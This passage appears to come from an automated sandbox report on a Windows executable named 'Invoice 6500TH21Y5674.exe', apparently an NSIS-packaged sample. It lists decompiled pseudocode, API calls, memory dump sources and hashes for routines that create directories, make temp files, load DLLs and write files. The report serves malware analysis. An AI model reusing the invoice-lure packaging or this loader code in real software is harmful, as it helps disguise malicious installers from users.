                                                					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                				__eflags = _t80 - _t75;
                                                				if(_t80 >= _t75) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t80 - 0xfffffffe;
                                                					if(_t80 != 0xfffffffe) {
                                                						E00406167(_t75, _t80, _t83, _t83, 0xffffffee);
                                                					} else {
                                                						E00406167(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                						lstrcatA(_t83,  *(_t85 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t83);
                                                					E004057F0();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}

















                                                0x00401859
                                                0x00401492
                                                0x00402387
                                                0x00402387
                                                0x00402387
                                                0x00401856
                                                0x0040184f
                                                0x00402a65
                                                0x00402a69
                                                0x00402a69
                                                0x00401883
                                                0x00401888
                                                0x00401896
                                                0x0040189b
                                                0x004018a1
                                                0x004018a5
                                                0x004018a7
                                                0x004018af
                                                0x004018bb
                                                0x004018a9
                                                0x004018a9
                                                0x004018ad
                                                0x00000000
                                                0x00000000
                                                0x004018ad
                                                0x004018c4
                                                0x004018ca
                                                0x004018cc
                                                0x00000000
                                                0x004018d2
                                                0x004018d2
                                                0x004018d5
                                                0x004018ed
                                                0x004018d7
                                                0x004018da
                                                0x004018e3
                                                0x004018e3
                                                0x004018f2
                                                0x004018f7
                                                0x00402382
                                                0x00000000
                                                0x00402382
                                                0x00000000

                                                APIs
                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                  • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,007A2760,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
                                                  • Part of subcall function 004051FB: lstrlenA.KERNEL32(0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                  • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                  • Part of subcall function 004051FB: lstrcatA.KERNEL32(0079ED48,00403210,00403210,0079ED48,00000000,00798F20,73BCEA30), ref: 00405257
                                                  • Part of subcall function 004051FB: SetWindowTextA.USER32(0079ED48,0079ED48), ref: 00405269
                                                  • Part of subcall function 004051FB: SendMessageA.USER32 ref: 0040528F
                                                  • Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052A9
                                                  • Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsb112C.tmp\System.dll$Call
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004056C1(CHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x408384;
                                                				_v36.Group = 0x408384;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x408374;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}








                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                • GetLastError.KERNEL32 ref: 00405718
                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040572D
                                                • GetLastError.KERNEL32 ref: 00405737
                                                Strings
                                                • C:\Users\user\Desktop, xrefs: 004056C1
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004056E7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040646F(intOrPtr _a4) {
                                                				char _v292;
                                                				int _t10;
                                                				struct HINSTANCE__* _t14;
                                                				void* _t16;
                                                				void* _t21;
                                                
                                                				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                				if(_t10 > 0x104) {
                                                					_t10 = 0;
                                                				}
                                                				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                					_t16 = 1;
                                                				} else {
                                                					_t16 = 0;
                                                				}
                                                				_t5 = _t16 + 0x40a014; // 0x5c
                                                				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                				return _t14;
                                                			}









                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
                                                • wsprintfA.USER32 ref: 004064BF
                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%s.dll$UXTHEME$\
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405C9C(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                				char _t11;
                                                				signed int _t12;
                                                				int _t15;
                                                				signed int _t17;
                                                				void* _t20;
                                                				CHAR* _t21;
                                                
                                                				_t21 = _a4;
                                                				_t20 = 0x64;
                                                				while(1) {
                                                					_t11 =  *0x40a3d4; // 0x61736e
                                                					_t20 = _t20 - 1;
                                                					_a4 = _t11;
                                                					_t12 = GetTickCount();
                                                					_t17 = 0x1a;
                                                					_a6 = _a6 + _t12 % _t17;
                                                					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                					if(_t15 != 0) {
                                                						break;
                                                					}
                                                					if(_t20 != 0) {
                                                						continue;
                                                					}
                                                					 *_t21 =  *_t21 & 0x00000000;
                                                					return _t15;
                                                				}
                                                				return _t21;
                                                			}










                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405CB0
                                                • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CCA
                                                Strings
                                                • nsa, xrefs: 00405CA7
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C9F
                                                • "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 00405C9C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E72AB16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				void _v36;
                                                				char _v88;
                                                				struct HINSTANCE__* _t37;
                                                				intOrPtr _t42;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t50;
                                                				void* _t54;
                                                				intOrPtr _t57;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				void* _t72;
                                                				void* _t76;
                                                
                                                				_t76 = __esi;
                                                				_t68 = __edi;
                                                				_t67 = __edx;
                                                				 *0x72ab405c = _a8;
                                                				 *0x72ab4060 = _a16;
                                                				 *0x72ab4064 = _a12;
                                                				 *((intOrPtr*)(_a20 + 0xc))( *0x72ab4038, E72AB1556);
                                                				_push(1); // executed
                                                				_t37 = E72AB1A98(); // executed
                                                				_t54 = _t37;
                                                				if(_t54 == 0) {
                                                					L28:
                                                					return _t37;
                                                				} else {
                                                					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                						E72AB22AF(_t54);
                                                					}
                                                					E72AB22F1(_t67, _t54);
                                                					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                					if(_t57 == 0xffffffff) {
                                                						L14:
                                                						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                                							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                								_t37 = E72AB24D8(_t54);
                                                							} else {
                                                								_push(_t76);
                                                								_push(_t68);
                                                								_t61 = 8;
                                                								_t13 = _t54 + 0x818; // 0x818
                                                								memcpy( &_v36, _t13, _t61 << 2);
                                                								_t42 = E72AB156B(_t54,  &_v88);
                                                								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                                								_t18 = _t54 + 0x818; // 0x818
                                                								_t72 = _t18;
                                                								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                                								 *_t72 = 3;
                                                								E72AB24D8(_t54);
                                                								_t63 = 8;
                                                								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                							}
                                                						} else {
                                                							E72AB24D8(_t54);
                                                							_t37 = GlobalFree(E72AB1266(E72AB1559(_t54)));
                                                						}
                                                						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                							_t37 = E72AB249E(_t54);
                                                							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                								_t37 =  *(_t54 + 0x808);
                                                								if(_t37 != 0) {
                                                									_t37 = FreeLibrary(_t37);
                                                								}
                                                							}
                                                							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                                								_t37 = E72AB14E2( *0x72ab4058);
                                                							}
                                                						}
                                                						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                                							goto L28;
                                                						} else {
                                                							return GlobalFree(_t54);
                                                						}
                                                					}
                                                					_t48 =  *_t54;
                                                					if(_t48 == 0) {
                                                						if(_t57 != 1) {
                                                							goto L14;
                                                						}
                                                						E72AB2CC3(_t54);
                                                						L12:
                                                						_t54 = _t48;
                                                						L13:
                                                						goto L14;
                                                					}
                                                					_t49 = _t48 - 1;
                                                					if(_t49 == 0) {
                                                						L8:
                                                						_t48 = E72AB2A38(_t57, _t54); // executed
                                                						goto L12;
                                                					}
                                                					_t50 = _t49 - 1;
                                                					if(_t50 == 0) {
                                                						E72AB26B2(_t54);
                                                						goto L13;
                                                					}
                                                					if(_t50 != 1) {
                                                						goto L14;
                                                					}
                                                					goto L8;
                                                				}
                                                			}



















                                                APIs
                                                  • Part of subcall function 72AB1A98: GlobalFree.KERNEL32 ref: 72AB1D09
                                                  • Part of subcall function 72AB1A98: GlobalFree.KERNEL32 ref: 72AB1D0E
                                                  • Part of subcall function 72AB1A98: GlobalFree.KERNEL32 ref: 72AB1D13
                                                • GlobalFree.KERNEL32 ref: 72AB1786
                                                • FreeLibrary.KERNEL32(?), ref: 72AB1809
                                                • GlobalFree.KERNEL32 ref: 72AB182E
                                                  • Part of subcall function 72AB22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 72AB22E0
                                                  • Part of subcall function 72AB26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72AB1757,00000000), ref: 72AB2782
                                                  • Part of subcall function 72AB156B: wsprintfA.USER32 ref: 72AB1599
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true
                                                 • Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 811f27ee0cd63ae26371bbf70cd4f0e179f5f3176e4ff58eb5a6db688a92c568
                                                • Instruction ID: d10ff5f0c53c033392ebea4997fa0d3989c0ac257c1699b72be26b7cfe724a58
                                                • Opcode Fuzzy Hash: 811f27ee0cd63ae26371bbf70cd4f0e179f5f3176e4ff58eb5a6db688a92c568
                                                • Instruction Fuzzy Hash: 10418372540244DBCB019F6CDAC4B953BAEBF09314F14A429E9079A49DDB7CC586CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E0040209D(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t18;
                                                				struct HINSTANCE__* _t26;
                                                				void* _t27;
                                                				struct HINSTANCE__* _t30;
                                                				CHAR* _t32;
                                                				intOrPtr* _t33;
                                                				void* _t34;
                                                
                                                				_t27 = __ebx;
                                                				asm("sbb eax, 0x7a3038");
                                                				 *(_t34 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x7a3008 =  *0x7a3008 +  *(_t34 - 4);
                                                					return 0;
                                                				}
                                                				_t32 = E00402BCE(0xfffffff0);
                                                				 *(_t34 + 8) = E00402BCE(1);
                                                				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                					L3:
                                                					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                					_t30 = _t18;
                                                					if(_t30 == _t27) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                					if(_t33 == _t27) {
                                                						E004051FB(0xfffffff7,  *(_t34 + 8));
                                                					} else {
                                                						 *(_t34 - 4) = _t27;
                                                						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x7a4000, 0x40b848, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                							if( *_t33() != 0) {
                                                								 *(_t34 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403887(_t30) != 0) {
                                                						FreeLibrary(_t30);
                                                					}
                                                					goto L16;
                                                				}
                                                				_t26 = GetModuleHandleA(_t32); // executed
                                                				_t30 = _t26;
                                                				if(_t30 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}











                                                APIs
                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                  • Part of subcall function 004051FB: lstrlenA.KERNEL32(0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                  • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,0079ED48,00000000,00798F20,73BCEA30,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                  • Part of subcall function 004051FB: lstrcatA.KERNEL32(0079ED48,00403210,00403210,0079ED48,00000000,00798F20,73BCEA30), ref: 00405257
                                                  • Part of subcall function 004051FB: SetWindowTextA.USER32(0079ED48,0079ED48), ref: 00405269
                                                  • Part of subcall function 004051FB: SendMessageA.USER32 ref: 0040528F
                                                  • Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052A9
                                                  • Part of subcall function 004051FB: SendMessageA.USER32 ref: 004052B7
                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                 • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                 • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2987980305-0
                                                • Opcode ID: 64ce8c824d27c4b08c71b8ea544765bea687fe357d244b1b968344694c42faba
                                                • Instruction ID: b82e27a23205e400b7882a9dda540b85adfac7e99319b749728402aba69a9ded
                                                • Opcode Fuzzy Hash: 64ce8c824d27c4b08c71b8ea544765bea687fe357d244b1b968344694c42faba
                                                • Instruction Fuzzy Hash: 55213B32500110EBCF207F608F48A5F36B0AF51358F20423BF601B51D0CBBC49829A1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E004015BB(char __ebx, void* __eflags) {
                                                				void* _t13;
                                                				int _t19;
                                                				char _t21;
                                                				void* _t22;
                                                				char _t23;
                                                				signed char _t24;
                                                				char _t26;
                                                				CHAR* _t28;
                                                				char* _t32;
                                                				void* _t33;
                                                
                                                				_t26 = __ebx;
                                                				_t28 = E00402BCE(0xfffffff0);
                                                				_t13 = E00405B05(_t28);
                                                				_t30 = _t13;
                                                				if(_t13 != __ebx) {
                                                					do {
                                                						_t32 = E00405A97(_t30, 0x5c);
                                                						_t21 =  *_t32;
                                                						 *_t32 = _t26;
                                                						 *((char*)(_t33 + 0xb)) = _t21;
                                                						if(_t21 != _t26) {
                                                							L5:
                                                							_t22 = E0040573E(_t28);
                                                						} else {
                                                							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040575B(_t39) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t22 = E004056C1(_t28); // executed
                                                							}
                                                						}
                                                						if(_t22 != _t26) {
                                                							if(_t22 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                							} else {
                                                								_t24 = GetFileAttributesA(_t28); // executed
                                                								if((_t24 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                						 *_t32 = _t23;
                                                						_t30 = _t32 + 1;
                                                					} while (_t23 != _t26);
                                                				}
                                                				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E004060D4("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
                                                					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                					if(_t19 == 0) {
                                                						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
                                                				return 0;
                                                			}














                                                APIs
                                                  • Part of subcall function 00405B05: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                  • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                  • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                  • Part of subcall function 004056C1: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 1892508949-47812868
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E00401389(signed int _a4, struct HWND__* _a11) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x7a2fb0;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if(_a11 != 0) {
                                                						 *0x7a274c =  *0x7a274c + _t12;
                                                						SendMessageA(_a11, 0x402, MulDiv( *0x7a274c, 0x7530,  *0x7a2734), 0);
                                                					}
                                                				}
                                                				return 0;
                                                			}











                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                • SendMessageA.USER32 ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004064DD(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a240);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                				}
                                                				_t5 = E0040646F(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}






                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                  • Part of subcall function 0040646F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
                                                  • Part of subcall function 0040646F: wsprintfA.USER32 ref: 004064BF
                                                  • Part of subcall function 0040646F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E00405C6D(CHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesA(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}






                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405C71
                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405C48(CHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesA(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}






                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,?,00405860,?,?,00000000,00405A43,?,?,?,?), ref: 00405C4D
                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040573E(CHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}





                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,00000000,00403318,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405744
                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405752
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405D14(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}






                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403290,00000000,00792120,000000FF,00792120,000000FF,000000FF,00000004,00000000), ref: 00405D28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: 77bff2a1fb4a149192ffadfb645e09873699659932145b723af6e3d7aa9a80e5
